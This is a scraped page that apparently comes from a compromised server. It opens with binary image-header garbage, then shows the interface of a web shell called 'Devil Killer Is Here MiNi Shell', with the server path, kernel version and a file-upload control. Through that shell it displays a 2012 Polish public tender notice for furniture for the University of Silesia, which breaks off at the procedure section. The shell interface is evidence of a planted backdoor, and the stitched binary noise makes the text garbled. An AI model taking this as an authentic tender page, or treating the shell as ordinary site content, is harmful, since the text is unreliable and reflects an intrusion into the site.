JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120723/160073-N-2012.html

<p class="kh_header"><b>Katowice: Dostawa mebli akademickich, biurowych i metalowych do obiektów Uniwersytetu Śląskiego w Katowicach, Cieszynie i Sosnowcu</b><br>
<b>Numer ogłoszenia: 160073 - 2012; data zamieszczenia: 23.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Śląski w Katowicach Dział Zamówień Publicznych , ul. Bankowa 12, 40-007 Katowice, woj. śląskie, tel. 32 3592048, faks 32 3592048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli akademickich, biurowych i metalowych do obiektów Uniwersytetu Śląskiego w Katowicach, Cieszynie i Sosnowcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa i montaż mebli, akademickich, biurowych oraz mebli metalowych, zwanych dalej meblami.<BR> 
2.Szczegółowy opis techniczny przedmiotu zamówienia zawierają załączniki nr 2A, 2B, 2C do SIWZ.<BR>
3. Zamawiający dopuszcza możliwość składania ofert częściowych zgodnie z poniższym podziałem:<BR>
A Meble biurowe i metalowe<BR> 	
B Meble akademickie<BR>  	
C Meble biurowe<BR>	
4. Zakres zamówienia obejmuje zakup mebli, ich dostarczenie do Zamawiającego pod  adres, wskazany w pkt 5 SIWZ, a także rozładunek oraz montaż mebli.<BR> 
5. Adres dostawy, rozładunku  i montażu:<BR>
 - W zakresie części A:<BR> 
a) poz. 1 - Rektorat Uniwersytetu Śląskiego, ul. Bankowa 12, 40-007 Katowice <BR>
b) poz. 2-4  - Wydział Filologiczny Uniwersytetu Śląskiego, pl. Sejmu Śl. 1 
Katowice;<BR>
c) poz. 5-10 - Wydział Nauk o Ziemi Uniwersytetu Śląskiego, ul. Będzińska 60, Sosnowiec;<BR>
d) poz. 11-12 - Wydział Mat-Fiz-Chem, ul. Bankowa 14, 40-007 Katowice<BR>
 - W zakresie części B:<BR> 
a) poz. 1 -  Wydział Pedagogiki i Psychologii, ul. Grażyńskiego 53, Katowice;<BR>
b) poz. 2-7  - Dom Asystenta nr 3, ul. Paderewskiego32, Katowice;<BR>
c) poz. 8-10 - Osiedle Akademickie w Cieszynie, ul. Niemcewicza 8 Cieszyn; 
 - W zakresie części C:<BR>
a) Wydział Filologiczny Uniwersytetu Śląskiego, pl. Sejmu Śl. 1<BR> 
Katowice;<BR>
6. Wymagany termin realizacji zamówienia w zakresie części A, B, C: do 21 dni od daty zawarcia umowy.<BR> 
7. Wymagany minimalny okres gwarancji w zakresie części A, B, C: na krzesła - 24 miesiące, nie krócej jednak niż gwarancja producenta.  Pozostałe meble - 36 miesięcy, nie krócej jednak niż gwarancja producenta.  Okres gwarancji rozpoczyna się z chwilą podpisania protokołu odbioru bez zastrzeżeń przez obie strony.<BR>
8. Wymagania Zamawiającego dotyczące oferowanych mebli oraz sposobu realizacji zamówienia:<BR> 
a) meble muszą być fabrycznie nowe i pochodzić z bieżącej produkcji;<BR> 
b) meble muszą być skręcane; Zamawiający nie dopuszcza mebli klejonych.<BR>
9. Meble winny posiadać poniższe atesty i certyfikaty:<BR>
W zakresie części A:<BR>
A) SZAFY METALOWE DO PRZECHOWYWANIA DOKUMENTACJI I REGAŁY METALOWE:
- Atest higieniczny na szafy oraz regały metalowe.<BR>
B) KRZESŁA STACJONARNE I OBROTOWE:<BR>
- Atest (sprawozdanie) z badań wytrzymałościowych;<BR>
- Raport z badań dotyczących odporności tapicerki na ścieranie: nie mniej niż 100 000 cykli (Martindale);<BR>
- Raport z badań dotyczących trudnopalności tapicerki przeprowadzony zgodnie z normą EN 1021-1-2:2006.<BR>
C) KRZESŁA AUDYTORYJNE:<BR>
- Atest wytrzymałościowy  w zakresie bezpieczeństwa użytkowania wg normy PN-EN 12727:2004 stopień 4, wydany przez ZBWPM PUR Remodex (lub równoważny);<BR>
- Klasyfikacja ogniowa w zakresie zapalności mebli tapicerskich zgodnie z normą PN-EN 1021-1:2007, PN-EN 1021-2:2007, klasyfikujący produkt jako trudno zapalny wydana przez Instytut Techniki Budowlanej (lub równoważny);<BR>
- Sprawozdanie z badań zapalności mebli klasyfikujące produkt jako trudno zapalny - wydany przez Zachodniopomorski Uniwersytet Technologiczny w Szczecinie -  dot. pulpit składany i panel frontowy (lub równoważny);<BR>
- Atest Higieniczny wydany przez Gdański Uniwersytet Medyczny,<BR> Międzywydziałowy Instytut Medycyny Morskiej i Tropikalnej (lub równoważny);<BR>
- Klasyfikacja ogniowa w zakresie wydzielania toksycznych produktów spalania wg kryteriów normy PN/88/B/02855 wydana przez Instytut Techniki Budowlanej w Warszawie(lub równoważny).<BR>
D) MEBLE PŁYTOWE:<BR>
- Atest higieniczny na płytę wiórową użytą do produkcji mebli;<BR>
- Atest higieniczny na obrzeże PCV.<BR>
W zakresie części B:<BR>
- Atest higieniczny na płytę wiórową użytą do produkcji mebli;<BR>
- Atest higieniczny na obrzeże PCV;<BR>
- Atest higieniczny na kleje;<BR>
- Atest higieniczny na powłokę lakierniczą (dot. stelaży metalowych);<BR>
- Oświadczenie o zgodności produkcji mebli z polskimi normami PN-92F-06000/01 oraz PN-92F-06000/02;<BR>
- Atest (sprawozdanie) na trudnopalność tapicerki wg parametrów wskazanych w opisie przedmiotu zamówienia;<BR>
- Atest (sprawozdanie) na trudnościeralność tapicerki wg parametrów wskazanych w opisie przedmiotu zamówienia.<BR>
- Meble winny być wykonane z płyty melaminowanej o grubości 18mm (jeżeli Zamawiający nie wskazał inaczej);<BR>
- Meble winny posiadać okleinę PCV nie mniejszą niż 2 mm;<BR>
W zakresie części C:<BR>
- Meble winny być wykonane z płyty melaminowanej o grubości 18mm (jeżeli Zamawiający nie wskazał inaczej);<BR>
- Blat kuchenny z płyty min. 30mm;<BR>
- Meble winny posiadać okleinę PCV, grubość nie mniejszą niż 1 mm (regały) i 2 mm (blaty);<BR>
- Przekrój stelaża stołów (dla studentów): dla kwadratowych rur min. 30x30 mm, dla stołów z okrągłych rur minimum o 40mm, pod blatem rura wzmacniająca  konstrukcję;<BR>
- Metoda malowania nóg: proszkowa <BR>
- Zamki w drzwiach z kluczem, którym można otworzyć tylko jeden zamek.<BR>
10. Dostawa wraz z montażem będzie wykonywana w dni robocze tj.: od poniedziałku do piątku w godzinach od 7.30 do 15.30. Zamawiający ma prawo odmówić przyjęcia mebli dostarczonych poza wyznaczonymi godzinami, a Wykonawcy nie przysługuje z tego tytułu żadne roszczenie.<BR> 
11. Naprawy gwarancyjne będą dokonywane bezpłatnie u Zamawiającego, a całkowite usunięcie usterki nastąpi w terminie nie dłuższym niż 7 dni od daty powiadomienia Wykonawcy o usterce.<BR> 
12. Jeżeli z przyczyn technicznych wady nie da się usunąć u Zamawiającego, Wykonawca zobowiązany jest bezpłatnie dostarczyć na okres dokonywanej naprawy mebel zastępczy, odpowiadający meblowi przekazanemu do naprawy. 
13. Jeżeli Zamawiający nie wskazał kolorystyki mebli, to po zawarciu umowy, a przed dokonaniem dostawy Wykonawca zobowiązany jest do uzgodnienia z Zamawiającym kolorystyki dostarczanych mebli (ewentualne preferencje wskazane w opisie technicznym - załączniki 2A, 2B, 2C).<BR>
14. Zamawiający dopuszcza składanie ofert równoważnych. Ilekroć w opisie przedmiotu zamówienia podane są wskazania określonego typu mebli oznacza to, że Zamawiający wymaga, aby oferowane meble wykonane były pod względem jakościowym i technicznym, w taki sposób jak przykładowy (wzorcowy) typ mebli wskazany w SIWZ. Wykonawcy mogą zaproponować rozwiązania równoważne o takich samych parametrach jak opisane w specyfikacji lub je przewyższające, jednak ich obowiązkiem jest udowodnienie równoważności.<BR> 
15. Dla krzeseł zamawiający dopuszcza odchylenie od podanych od podanych wymiarów na poziomie + 4%. Dla mebli Zamawiający nie dopuszcza zmiany wymiarów blatów biurek, wysokości biurek oraz głębokości i szerokości szaf, dla pozostałych wymiarów Zamawiający dopuszcza odchylenie od podanych wartości na poziomie + 3%.<BR> 
16. Ewentualne wskazane nazwy produktów oraz ich producentów mają na celu jedynie przybliżyć wymagania, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń.<BR> 
17.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.<BR> 
18.Zamawiający dopuszcza możliwość realizacji zamówienia z udziałem podwykonawców. W przypadku korzystania z podwykonawców w ofercie należy wskazać część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom (załącznik nr 3 do SIWZ).<BR> 
19.Zamawiający nie przewiduje udzielenia zamówień uzupełniających.<BR> 
20.Wszelkie rozliczenia finansowe między Zamawiającym a Wykonawcą dokonywane będą w polskich złotych (PLN).<BR> 
21.Zamawiający nie przewiduje aukcji elektronicznej.<BR> 
22.Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.<BR> 
23.Zamawiający nie przewiduje zawarcia umowy ramowej.<BR> 
24.Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.<BR> 
25.Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla Wykonawców, u których ponad 50% zatrudnionych stanowią osoby niepełnosprawne.<BR>.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.13.40.00-0, 39.13.00.00-2, 39.16.00.00-1, 39.10.00.00-3, 39.14.00.00-5, 39.00.00.00-2, 39.13.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości:<BR>
a)w zakresie części A:  1150,00 PLN (słownie: jeden tysiąc sto pięćdziesiąt złotych 00/100 PLN)<BR>
b)w zakresie części B:  950,00 PLN (słownie: osiemset pięćdziesiąt złotych 00/100 PLN)<BR>
c)w zakresie części C:  800,00 PLN (słownie: osiemset złotych 00/100 PLN)<BR>
- przelewem na rachunek Zamawiającego lub<BR>
- w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym lub<BR>
- w gwarancjach bankowych lub<BR>
- w gwarancjach ubezpieczeniowych lub<BR>
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).<BR>
2.Wadium wnoszone w pieniądzu należy zgodnie z art. 45 ust 7 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. U. z 2010 r., Nr 113 poz. 759 z późn. zm.), wpłacić na rachunek bankowy Zamawiającego: Bank Śląski Spółka Akcyjna o/Katowice, nr rachunku 29 1050 1214 1000 0022 0331 4816, w takim terminie, aby najpóźniej przed upływem terminu składania ofert - wskazanym w rozdziale VI ust. 1 SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego ww. rachunek.<BR>  
3.Wymagania dotyczące wadium wnoszonego w formie gwarancji i poręczeń:<BR>
1) niebudzące wątpliwości, zobowiązanie gwaranta lub poręczyciela do zapłaty beneficjentowi /wierzycielowi (Zamawiającemu t.j.) należności, w przypadku gdy:
a) zleceniodawca / dłużnik (Wykonawca) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3  ustawy - Pzp, nie złożył dokumentów o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,<BR>
b) oferta zleceniodawcy / dłużnika (Wykonawcy) została wybrana, a:<BR>
- zleceniodawca / dłużnik (Wykonawca) odmówił podpisania umowy w sprawie zamówienia   publicznego na warunkach określonych w ofercie;<BR>
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn  leżących po stronie zleceniodawcy / dłużnika (Wykonawcy).<BR>
2) zobowiązanie gwaranta / poręczyciela winno być nieodwołalne, bezwarunkowe i płatne na  pierwsze żądanie beneficjenta / wierzyciela (Zamawiającego).<BR>
3) gwarancja / poręczenie winny spełniać wymogi określone we właściwych przepisach.<BR>
Powyższe warunki muszą wynikać z gwarancji lub poręczenia.<BR>
4.Wadium, bez względu na sposób jego wniesienia, musi obejmować co najmniej cały okres  związania ofertą, o którym mowa w rozdziale VI ust. 2 niniejszej Specyfikacji Istotnych Warunków Zamówienia.<BR>
5.W przypadkach, o których mowa w rozdziale VI ust. 3 niniejszej Specyfikacji Istotnych Warunków Zamówienia oraz w przypadku wniesienia odwołania po upływie terminu składania ofert, Zamawiający zwróci się do Wykonawców o przedłużenie ważności wadium lub wniesienie nowego wadium z tym, że jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie kieruje się jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.<BR>
6. W przypadku wniesienia wadium przelewem zaleca się, aby Wykonawca dołączył do oferty  kserokopię dokonania przelewu.<BR>
7. W przypadku wniesienia wadium w pozostałych formach (gwarancje, poręczenia) oryginał dokumentu potwierdzającego wniesienie wadium Wykonawca winien dołączyć do oferty.<BR>
8. Zamawiający dokona zwrotu wadium Wykonawcom zgodnie z postanowieniami art. 46 ust. 1 i ust. 2 ustawy - Prawo zamówień publicznych z zastrzeżeniem ust. 4a i ust. 5.<BR>
9.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:<BR>
1) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy - Prawo zamówień publicznych, nie złożył dokumentów o których mowa w art. 25 ust. 1 ustawy - Prawo zamówień publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie,<BR>
2) którego oferta została wybrana: <BR>
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<BR>
b)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.<BR></p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie szczegółowego opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie szczegółowego opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie szczegółowego opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie szczegółowego opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje powyższego warunku poprzez stworzenie szczegółowego opisu sposobu dokonywania oceny jego spełniania. Zamawiający oceni czy Wykonawca spełnia powyższy warunek w oparciu o oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa  w rozdziale IV ust.1 pkt 1 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, Wykonawca dołączy do oferty:<BR>
1. Opis techniczny mebli wraz z informacją o posiadanych atestach i certyfikatach, a także  zgodnością z wymaganymi normami (wzór stanowią załączniki 2A.1, 2B.1, 2C.1) - w zakresie każdej części.Oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę <BR>
2. Wykaz oferowanych mebli zawierający ilości mebli, ich ceny jednostkowe netto, wartości netto (wzór stanowią załączniki 2A.2, 2B.2, 2C.2) w zakresie każdej części.	Oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.<BR></p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Informacja o działalności gospodarczej wygenerowana z Centralnej Ewidencji Działalności Gospodarczej (CEIDG) - składa Wykonawca będący osobą fizyczną prowadzącą działalność gospodarczą (Dołączenie wydruku zalecane przez Zamawiającego).	Wydruk ze strony internetowej CEIDG. <BR>
2. Pełnomocnictwo - (wymagane) jeżeli oferta jest podpisana przez pełnomocnika (z wyłączeniem prokurenta) nawet jeżeli jest on ujawniony w dokumencie rejestrowym). W razie wątpliwości co do ważności lub zakresu posiadanego pełnomocnictwa Zamawiający zastrzega sobie prawo do żądania potwierdzenia pełnomocnictwa przez Wykonawcę. Oryginał lub czytelna wyraźna kserokopia poświadczona za zgodność z oryginałem przez mocodawcę lub notariusza.<BR>
3. Jeśli Wykonawca będzie realizował zamówienie z udziałem podwykonawców Zamawiający żąda wskazania części zamówienia, której wykonanie powierzy podwykonawcom. Załącznik nr 3 do SIWZ (Zamawiający dopuszcza odtworzenie formularza)- Oryginał <BR>
4. Dokument potwierdzający wniesienie wadium.Oryginał. W przypadku wniesienia wadium przelewem zaleca się, dołączenie do oferty kserokopii  dokonania przelewu.<BR>
5. 
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3.1). zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania lub kraju, 
w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
Ww. dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.	         
Oryginał lub kopia poświadczona za zgodność 
z oryginałem przez Wykonawcę.<BR></p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
